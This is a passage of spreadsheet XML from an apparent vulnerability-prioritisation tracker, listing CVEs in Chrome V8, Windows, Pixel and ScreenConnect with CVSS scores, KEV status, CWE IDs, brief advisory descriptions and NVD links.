xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2265" r:id="rId2264" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2266" r:id="rId2265" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2267" r:id="rId2266" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2268" r:id="rId2267" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2269" r:id="rId2268" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2270" r:id="rId2269" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2271" r:id="rId2270" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2272" r:id="rId2271" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2273" r:id="rId2272" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2274" r:id="rId2273" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2275" r:id="rId2274" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2276" r:id="rId2275" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2277" r:id="rId2276" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2278" r:id="rId2277" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2279" r:id="rId2278" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2280" r:id="rId2279" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2281" r:id="rId2280" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2282" r:id="rId2281" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2283" r:id="rId2282" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2284" r:id="rId2283" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2285" r:id="rId2284" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2286" r:id="rId2285" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2287" r:id="rId2286" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2288" r:id="rId2287" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2289" r:id="rId2288" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2290" r:id="rId2289" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2291" r:id="rId2290" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2292" r:id="rId2291" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2293" r:id="rId2292" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2294" r:id="rId2293" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2295" r:id="rId2294" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2296" r:id="rId2295" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2297" r:id="rId2296" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2298" r:id="rId2297" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2299" r:id="rId2298" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2300" r:id="rId2299" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2301" r:id="rId2300" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2302" r:id="rId2301" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2303" r:id="rId2302" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2304" r:id="rId2303" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2305" r:id="rId2304" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2306" r:id="rId2305" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2307" r:id="rId2306" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2308" r:id="rId2307" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2309" r:id="rId2308" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2310" r:id="rId2309" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2311" r:id="rId2310" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2312" r:id="rId2311" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2313" r:id="rId2312" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2314" r:id="rId2313" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2315" r:id="rId2314" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2316" r:id="rId2315" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2317" r:id="rId2316" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2318" r:id="rId2317" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2319" r:id="rId2318" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2320" r:id="rId2319" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2321" r:id="rId2320" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2322" r:id="rId2321" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2323" r:id="rId2322" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2324" r:id="rId2323" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2325" r:id="rId2324" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2326" r:id="rId2325" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2327" r:id="rId2326" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2328" r:id="rId2327" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2329" r:id="rId2328" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2330" r:id="rId2329" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2331" r:id="rId2330" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2332" r:id="rId2331" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2333" r:id="rId2332" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2334" r:id="rId2333" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2335" r:id="rId2334" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2336" r:id="rId2335" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2337" r:id="rId2336" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2338" r:id="rId2337" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2339" r:id="rId2338" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2340" r:id="rId2339" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2341" r:id="rId2340" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2342" r:id="rId2341" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2343" r:id="rId2342" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2344" r:id="rId2343" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2345" r:id="rId2344" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2346" r:id="rId2345" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2347" r:id="rId2346" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2348" r:id="rId2347" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2349" r:id="rId2348" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2350" r:id="rId2349" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2351" r:id="rId2350" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2352" r:id="rId2351" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2353" r:id="rId2352" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2354" r:id="rId2353" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2355" r:id="rId2354" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2356" r:id="rId2355" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2357" r:id="rId2356" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2358" r:id="rId2357" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2359" r:id="rId2358" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2360" r:id="rId2359" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2361" r:id="rId2360" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2362" r:id="rId2361" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2363" r:id="rId2362" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2364" r:id="rId2363" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2365" r:id="rId2364" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2366" r:id="rId2365" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2367" r:id="rId2366" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2368" r:id="rId2367" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2369" r:id="rId2368" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2370" r:id="rId2369" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2371" r:id="rId2370" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2372" r:id="rId2371" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2373" r:id="rId2372" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2374" r:id="rId2373" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2375" r:id="rId2374" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2376" r:id="rId2375" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2377" r:id="rId2376" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2378" r:id="rId2377" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2379" r:id="rId2378" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2380" r:id="rId2379" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2381" r:id="rId2380" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2382" r:id="rId2381" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2383" r:id="rId2382" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2384" r:id="rId2383" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2385" r:id="rId2384" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2386" r:id="rId2385" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2387" r:id="rId2386" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2388" r:id="rId2387" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2389" r:id="rId2388" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2390" r:id="rId2389" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2391" r:id="rId2390" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2392" r:id="rId2391" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2393" r:id="rId2392" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2394" r:id="rId2393" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2395" r:id="rId2394" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2396" r:id="rId2395" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2397" r:id="rId2396" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2398" r:id="rId2397" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2399" r:id="rId2398" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2400" r:id="rId2399" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2401" r:id="rId2400" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2402" r:id="rId2401" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2403" r:id="rId2402" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2404" r:id="rId2403" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2405" r:id="rId2404" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2406" r:id="rId2405" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2407" r:id="rId2406" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2408" r:id="rId2407" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2409" r:id="rId2408" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2410" r:id="rId2409" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2411" r:id="rId2410" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2412" r:id="rId2411" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2413" r:id="rId2412" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2414" r:id="rId2413" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2415" r:id="rId2414" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2416" r:id="rId2415" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2417" r:id="rId2416" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2418" r:id="rId2417" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2419" r:id="rId2418" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2420" r:id="rId2419" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2421" r:id="rId2420" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2422" r:id="rId2421" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2423" r:id="rId2422" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2424" r:id="rId2423" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2425" r:id="rId2424" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2426" r:id="rId2425" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2427" r:id="rId2426" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2428" r:id="rId2427" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2429" r:id="rId2428" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2430" r:id="rId2429" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2431" r:id="rId2430" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2432" r:id="rId2431" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2433" r:id="rId2432" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2434" r:id="rId2433" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2435" r:id="rId2434" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2436" r:id="rId2435" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2437" r:id="rId2436" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2438" r:id="rId2437" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2439" r:id="rId2438" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2440" r:id="rId2439" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2441" r:id="rId2440" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2442" r:id="rId2441" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2443" r:id="rId2442" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2444" r:id="rId2443" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2445" r:id="rId2444" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2446" r:id="rId2445" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2447" r:id="rId2446" /></hyperlinks><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2026-09-14</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</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is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85046</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>google:chrome, google:v8</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5"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S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
